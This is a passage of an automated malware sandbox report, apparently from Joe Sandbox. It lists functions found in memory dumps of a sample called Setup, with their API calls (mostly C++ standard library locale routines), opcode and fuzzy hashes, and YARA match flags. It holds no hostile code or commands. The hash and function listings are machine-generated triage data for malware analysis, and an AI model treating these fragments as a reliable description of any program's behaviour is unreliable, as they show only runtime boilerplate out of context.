LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 031DB7CC
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 031DB7EF

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: bc4167a321a66ef44a1993f04fcf44c0e2359615d9d349bacfaf90a979f8ebae
Instruction ID: 80a9ab60eeab78f24782586e9efa89bc48a9fbe29053542c670d8affeec94bbd
Opcode Fuzzy Hash: bc4167a321a66ef44a1993f04fcf44c0e2359615d9d349bacfaf90a979f8ebae
Instruction Fuzzy Hash: 3E51B376504216AFEF20DF55CC44FAB7BA9EF4A680F1A8524F916AA290DB34D850CB90

Function 031D6C80 Relevance: 9.2, APIs: 6, Instructions: 151COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 031D6CBF
std::_Lockit::_Lockit.LIBCPMT ref: 031D6CE1
std::_Lockit::~_Lockit.LIBCPMT ref: 031D6D09
__Getctype.LIBCPMT ref: 031D6DE4
std::_Facet_Register.LIBCPMT ref: 031D6E4A
std::_Lockit::~_Lockit.LIBCPMT ref: 031D6E7E

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: eca87b878f873a5f495480ccf37ea05563973e2895d08a27c1b42d58ab3ae94c
Instruction ID: cfd212c716fc05e2c6f0efff24eba564af8bc9804870395baf7acc0f173516ce
Opcode Fuzzy Hash: eca87b878f873a5f495480ccf37ea05563973e2895d08a27c1b42d58ab3ae94c
Instruction Fuzzy Hash: 7A61CEB1D0064ADFDB00DFA8D9047AEFBF4FF5A314F248259C445AB281DB74AA85CB90

Function 02D6AD14 Relevance: 9.2, APIs: 6, Instructions: 150COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02D6AD64
std::_Lockit::_Lockit.LIBCPMT ref: 02D6AD86
std::_Lockit::~_Lockit.LIBCPMT ref: 02D6ADAE
__Getctype.LIBCPMT ref: 02D6AE89
std::_Facet_Register.LIBCPMT ref: 02D6AEC4
std::_Lockit::~_Lockit.LIBCPMT ref: 02D6AEF8

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: bbaf182166c10a6998b5d7f3ce15c2de940b3d73265d80bf636c62bcb6e79074
Instruction ID: 3461917845f1c238848c51c46eed9a28f0733d12e30e6dde66da12361250a6cd
Opcode Fuzzy Hash: bbaf182166c10a6998b5d7f3ce15c2de940b3d73265d80bf636c62bcb6e79074
Instruction Fuzzy Hash: A35189B1D00209DBDB00DF98C9447AEFBB4FF54314F24816AC895AB381EB75AE45CBA5

Function 031B9530 Relevance: 9.2, APIs: 6, Instructions: 150COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 031B9580
std::_Lockit::_Lockit.LIBCPMT ref: 031B95A2
std::_Lockit::~_Lockit.LIBCPMT ref: 031B95CA
__Getctype.LIBCPMT ref: 031B96A5
std::_Facet_Register.LIBCPMT ref: 031B96E0
std::_Lockit::~_Lockit.LIBCPMT ref: 031B9714

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: 62d3ca0d6b88a4a31dd90d1c2d9121239660c570fde6e0b8733d41b7dbd383a8
Instruction ID: 286154dbb34321ccba436b3fd43a87266f938c5ea4dcb4f9f8e401b4ae4d5db5
Opcode Fuzzy Hash: 62d3ca0d6b88a4a31dd90d1c2d9121239660c570fde6e0b8733d41b7dbd383a8
Instruction Fuzzy Hash: B75187B5D00249DFDB00DFA8D9447AEFBB4FF49314F248199C915AB380EB75AA85CB90

Function 031F1AAA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,031F1AA1,031EFBEC,031D8094), ref: 031F1AB8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 031F1AC6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 031F1ADF
SetLastError.KERNEL32(00000000,031F1AA1,031EFBEC,031D8094), ref: 031F1B31

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 51d5ab1b34fc537d481d7b7aa35b637f1a46dc7fe8ecf27a07e955a64d2fed44
Instruction ID: 0c49b162de73de26a409ec40480849f1023706756db499ec5b983aff2f09e917
Opcode Fuzzy Hash: 51d5ab1b34fc537d481d7b7aa35b637f1a46dc7fe8ecf27a07e955a64d2fed44
Instruction Fuzzy Hash: 4001FC3A20D761FFE725B6B57D98AA72699DF1E6707340339E724550D0FF5288015280

Function 02D916D2 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D916D9
std::_Lockit::_Lockit.LIBCPMT ref: 02D916E3

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

numpunct.LIBCPMT ref: 02D9171D
std::_Facet_Register.LIBCPMT ref: 02D91734
std::_Lockit::~_Lockit.LIBCPMT ref: 02D91754
Concurrency::cancel_current_task.LIBCPMT ref: 02D91761

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
String ID:
API String ID: 3064348918-0
Opcode ID: 18dd5b8b0e882bd2422f7af078571c49340943f4e7adeec62e9aa60380ab10c8
Instruction ID: 387d5ed6c780df2f3ff60308bb48eaf0a9c178ee02893b69065c42e25473e427
Opcode Fuzzy Hash: 18dd5b8b0e882bd2422f7af078571c49340943f4e7adeec62e9aa60380ab10c8
Instruction Fuzzy Hash: 3D01ED3590011ACBCF05EBA8C9506BDBBA2EF84320F24441EE905AB380DF75DE01CBA5

Function 031DFEEE Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031DFEF5
std::_Lockit::_Lockit.LIBCPMT ref: 031DFEFF

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

numpunct.LIBCPMT ref: 031DFF39
std::_Facet_Register.LIBCPMT ref: 031DFF50
std::_Lockit::~_Lockit.LIBCPMT ref: 031DFF70
Concurrency::cancel_current_task.LIBCPMT ref: 031DFF7D

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
String ID:
API String ID: 3064348918-0
Opcode ID: 64ef502e327add9e4473471a2f2e0477b3f28e4f23af16484e227901dbea147f
Instruction ID: bc9b88cbdcaa19d89df9d8ed160cbbe5fbbe9a826b2c8c31a623e7f499619150
Opcode Fuzzy Hash: 64ef502e327add9e4473471a2f2e0477b3f28e4f23af16484e227901dbea147f
Instruction Fuzzy Hash: 0901967E9103199BCB05EBA8D9046BEB7B5AF4E310F144509E5116F2D0CF749B42CB91

Function 02D912BF Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D912C6
std::_Lockit::_Lockit.LIBCPMT ref: 02D912D0

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

moneypunct.LIBCPMT ref: 02D9130A
std::_Facet_Register.LIBCPMT ref: 02D91321
std::_Lockit::~_Lockit.LIBCPMT ref: 02D91341
Concurrency::cancel_current_task.LIBCPMT ref: 02D9134E

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: e8fd516ca53c7942c66ab3fd9352789b9dfc00f6b8b5d342a3d06256c0c9aeda
Instruction ID: bc7b8de7eeb0c4a1bf71d04e7ac2164d1db75d4bf3799fb5e71644740fd80cd7
Opcode Fuzzy Hash: e8fd516ca53c7942c66ab3fd9352789b9dfc00f6b8b5d342a3d06256c0c9aeda
Instruction Fuzzy Hash: 5501AD31A001269BCF05EB64CA546BDBBB2EF84310F24412EE85567390DF759E01CFA9

Function 02D9122A Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D91231
std::_Lockit::_Lockit.LIBCPMT ref: 02D9123B

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

moneypunct.LIBCPMT ref: 02D91275
std::_Facet_Register.LIBCPMT ref: 02D9128C
std::_Lockit::~_Lockit.LIBCPMT ref: 02D912AC
Concurrency::cancel_current_task.LIBCPMT ref: 02D912B9

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: 69accdf9a348cfa7df098235a5e72701dded504d52d50a77557dd09122a7f64d
Instruction ID: bd3df7f52947466ea37cadc9dd9c58c4279a8843bea3978e79052ba941da87b8
Opcode Fuzzy Hash: 69accdf9a348cfa7df098235a5e72701dded504d52d50a77557dd09122a7f64d
Instruction Fuzzy Hash: F301AD3190412A9FCF05FBA4C9546BDBBA6EF84310F25851AE815AB3D0DF749E01CFA9

Function 02D91354 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D9135B
std::_Lockit::_Lockit.LIBCPMT ref: 02D91365

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

moneypunct.LIBCPMT ref: 02D9139F
std::_Facet_Register.LIBCPMT ref: 02D913B6
std::_Lockit::~_Lockit.LIBCPMT ref: 02D913D6
Concurrency::cancel_current_task.LIBCPMT ref: 02D913E3

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: 96a722ef78b31369ee55bd3ccfb9f27fffd39944d2911880095fa3572dcbfa57
Instruction ID: 8c0124ee9f51db959c53dd24432a249a7c2210246c80319a894c130c17d652da
Opcode Fuzzy Hash: 96a722ef78b31369ee55bd3ccfb9f27fffd39944d2911880095fa3572dcbfa57
Instruction Fuzzy Hash: 6101C032A0011A9BCF05EBA4D9506BEBBB2EF84310F24455EE85567380DFB5DE01CFA5

Function 02D9163D Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D91644
std::_Lockit::_Lockit.LIBCPMT ref: 02D9164E

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

numpunct.LIBCPMT ref: 02D91688
std::_Facet_Register.LIBCPMT ref: 02D9169F
std::_Lockit::~_Lockit.LIBCPMT ref: 02D916BF
Concurrency::cancel_current_task.LIBCPMT ref: 02D916CC

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
String ID:
API String ID: 3064348918-0
Opcode ID: ae7962d973eb96154aa224717107d16c7ae73739b57ff5cccb206d995a53061f
Instruction ID: 911bbac6a85da7cdc579f02ed401861edeb26fbfb2ef76a628f2c19b5fb144bb
Opcode Fuzzy Hash: ae7962d973eb96154aa224717107d16c7ae73739b57ff5cccb206d995a53061f
Instruction Fuzzy Hash: 1801CB72C001569BCF05FBA4C9006AEBBB2EF84310F28411EE81567380DF759E01CFA5

Function 02D9CB06 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D9CB0D
std::_Lockit::_Lockit.LIBCPMT ref: 02D9CB17

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

messages.LIBCPMT ref: 02D9CB51
std::_Facet_Register.LIBCPMT ref: 02D9CB68
std::_Lockit::~_Lockit.LIBCPMT ref: 02D9CB88
Concurrency::cancel_current_task.LIBCPMT ref: 02D9CB95

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
String ID:
API String ID: 958335874-0
Opcode ID: 3b023bc84f7f1bab804e7ef3c50303b96b90a4c28830213ffb59d465bd7f2053
Instruction ID: 3e2afa43d84ca5b70a9bbbf114718eb82460bcf57ccdab5fdf3f565592658f0c
Opcode Fuzzy Hash: 3b023bc84f7f1bab804e7ef3c50303b96b90a4c28830213ffb59d465bd7f2053
Instruction Fuzzy Hash: 0601AD319101168BCF05EBA8C9506FDBBB2EF84324F24451EE415AB380DF759E05CBA5

Function 02D9CCC5 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D9CCCC
std::_Lockit::_Lockit.LIBCPMT ref: 02D9CCD6

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

moneypunct.LIBCPMT ref: 02D9CD10
std::_Facet_Register.LIBCPMT ref: 02D9CD27
std::_Lockit::~_Lockit.LIBCPMT ref: 02D9CD47
Concurrency::cancel_current_task.LIBCPMT ref: 02D9CD54

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: c3066c0aceaebd5e1d8a464e8774f452b4981e6528b835b4ea4bdb287f5a9c74
Instruction ID: 92617825dfc8f23e47067661618991669b1ebf8348c92ce788e3e6e83bd36809
Opcode Fuzzy Hash: c3066c0aceaebd5e1d8a464e8774f452b4981e6528b835b4ea4bdb287f5a9c74
Instruction Fuzzy Hash: F101AD319101159BCF05EBA8C9506FDBBA2EF88320F24441AE5116B390DF759E41CFA5

Function 02D9CD5A Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D9CD61
std::_Lockit::_Lockit.LIBCPMT ref: 02D9CD6B

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

moneypunct.LIBCPMT ref: 02D9CDA5
std::_Facet_Register.LIBCPMT ref: 02D9CDBC
std::_Lockit::~_Lockit.LIBCPMT ref: 02D9CDDC
Concurrency::cancel_current_task.LIBCPMT ref: 02D9CDE9

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: 23ddec356488aa7d80e561ef1a5de9efe688d141ee9816f6cdaef3e517060c40
Instruction ID: 96907223107df968d70e852ebacdb9cd96540b5030801f89a4896322636a9f57
Opcode Fuzzy Hash: 23ddec356488aa7d80e561ef1a5de9efe688d141ee9816f6cdaef3e517060c40
Instruction Fuzzy Hash: 8F0180359101159FCF05EBA8C9506BDBBA2EF88310F25451EE511AB390DF759E01CFA5

Function 031DF633 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031DF63A
std::_Lockit::_Lockit.LIBCPMT ref: 031DF644

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

messages.LIBCPMT ref: 031DF67E
std::_Facet_Register.LIBCPMT ref: 031DF695
std::_Lockit::~_Lockit.LIBCPMT ref: 031DF6B5
Concurrency::cancel_current_task.LIBCPMT ref: 031DF6C2

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
String ID:
API String ID: 958335874-0
Opcode ID: f9a2f17896d9ceef3598bb1ed9a0f87247f509836c88110e714e71a18a6f799c
Instruction ID: 37ebfc7616fa34f435e26c37c1ced5fed7585c0be6a9a462eaed9589489ab041
Opcode Fuzzy Hash: f9a2f17896d9ceef3598bb1ed9a0f87247f509836c88110e714e71a18a6f799c
Instruction Fuzzy Hash: 1201963A9003599BCB05EBA8D514BBEB7F5AF4D311F144509D9116F290CFB49E45C790

Function 031DF6C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031DF6CF
std::_Lockit::_Lockit.LIBCPMT ref: 031DF6D9

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

messages.LIBCPMT ref: 031DF713
std::_Facet_Register.LIBCPMT ref: 031DF72A
std::_Lockit::~_Lockit.LIBCPMT ref: 031DF74A
Concurrency::cancel_current_task.LIBCPMT ref: 031DF757

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
String ID:
API String ID: 958335874-0
Opcode ID: 955bc05d7b0093f0e9ca002f5c4fbba86ec97094f2c810b31fa03fc862bdcc4f
Instruction ID: 681e7137e6a6253a23e5a00a3e8df1f6a76fc9f3776d3baed43ac6e6641d7c56
Opcode Fuzzy Hash: 955bc05d7b0093f0e9ca002f5c4fbba86ec97094f2c810b31fa03fc862bdcc4f
Instruction Fuzzy Hash: C501963D9107299BCB05EBA8D9086BEB7B5AF4D711F154509D4116F2C0CF749A42CB90

Function 031DF59E Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031DF5A5
std::_Lockit::_Lockit.LIBCPMT ref: 031DF5AF

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

ctype.LIBCPMT ref: 031DF5E9
std::_Facet_Register.LIBCPMT ref: 031DF600
std::_Lockit::~_Lockit.LIBCPMT ref: 031DF620
Concurrency::cancel_current_task.LIBCPMT ref: 031DF62D

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
String ID:
API String ID: 2958136301-0
Opcode ID: 2052d5b32c5ff4abf7f13eef57e18330d9dc7af0cadfdcc906300c63f3e45385
Instruction ID: 26603d418c39a7c40661ef594fa160fe41074f17636222a61f573153c9cd0c7a
Opcode Fuzzy Hash: 2052d5b32c5ff4abf7f13eef57e18330d9dc7af0cadfdcc906300c63f3e45385
Instruction Fuzzy Hash: 5801807A9102199FCB05EBA8E904ABEB7B5BF4E311F184509D412AF294CFB49A41CB90

Function 031DFB70 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031DFB77
std::_Lockit::_Lockit.LIBCPMT ref: 031DFB81

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

moneypunct.LIBCPMT ref: 031DFBBB
std::_Facet_Register.LIBCPMT ref: 031DFBD2
std::_Lockit::~_Lockit.LIBCPMT ref: 031DFBF2
Concurrency::cancel_current_task.LIBCPMT ref: 031DFBFF

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: 4a71d06185afb16320c22d5f9faa5adffc607c3b165b8c45ac4909fc8161dfc0
Instruction ID: 61714f8a9bcb53c4037e2312f975c8f35518ba9b000ddcacf41b4ed6bf5d300f
Opcode Fuzzy Hash: 4a71d06185afb16320c22d5f9faa5adffc607c3b165b8c45ac4909fc8161dfc0
Instruction Fuzzy Hash: FE01923A9106599BCB05FFA8D914ABEB7B5AF4D710F284149D4116F280CFB4AB42CB90

Function 031DFA46 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031DFA4D
std::_Lockit::_Lockit.LIBCPMT ref: 031DFA57

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

moneypunct.LIBCPMT ref: 031DFA91
std::_Facet_Register.LIBCPMT ref: 031DFAA8
std::_Lockit::~_Lockit.LIBCPMT ref: 031DFAC8
Concurrency::cancel_current_task.LIBCPMT ref: 031DFAD5

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: d5d35160160d151ead9ffbc74861964a13ed1ee280c8796d64f981fb2d87dd59
Instruction ID: 553937d329aeff9b103b17927523ced4d83ab47a8c287a307e7009075c93fe2a
Opcode Fuzzy Hash: d5d35160160d151ead9ffbc74861964a13ed1ee280c8796d64f981fb2d87dd59
Instruction Fuzzy Hash: 4301843990071A9FCB05EBA8D9047BEB7A5AF4D710F194509D4116F280DFB49B42C790

Function 031DFADB Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031DFAE2
std::_Lockit::_Lockit.LIBCPMT ref: 031DFAEC

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

moneypunct.LIBCPMT ref: 031DFB26
std::_Facet_Register.LIBCPMT ref: 031DFB3D
std::_Lockit::~_Lockit.LIBCPMT ref: 031DFB5D
Concurrency::cancel_current_task.LIBCPMT ref: 031DFB6A

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: f9b083d923acf20fe507162b4bc553497cdb7fe173f4e6bb5d0ebc5d5bfdb1f4
Instruction ID: 49029387e695caa5dd7db6a7e83044b0c87aa2e883113bfd8d5670c28de55201
Opcode Fuzzy Hash: f9b083d923acf20fe507162b4bc553497cdb7fe173f4e6bb5d0ebc5d5bfdb1f4
Instruction Fuzzy Hash: A901923A9103199FCB05FBA8D958ABEB7B5AF5D710F144109D5126F2C0CFB4AA42CB90

Function 031DF9B1 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031DF9B8
std::_Lockit::_Lockit.LIBCPMT ref: 031DF9C2

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

moneypunct.LIBCPMT ref: 031DF9FC
std::_Facet_Register.LIBCPMT ref: 031DFA13
std::_Lockit::~_Lockit.LIBCPMT ref: 031DFA33
Concurrency::cancel_current_task.LIBCPMT ref: 031DFA40

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: f75f4bc26e724c098f736c6cc467072564fad99d8a737315a8675395c8b24f7c
Instruction ID: c3f0c0f260e2b3f7e9698de7f2dbc9fa6c6730ad2d19c9094ce23e2f77183e11
Opcode Fuzzy Hash: f75f4bc26e724c098f736c6cc467072564fad99d8a737315a8675395c8b24f7c
Instruction Fuzzy Hash: D701D23A910329ABCB04EBA8D9046BEB7F5AF4E710F194108D4126F380DFB4AB42C780

Function 031DFE59 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031DFE60
std::_Lockit::_Lockit.LIBCPMT ref: 031DFE6A

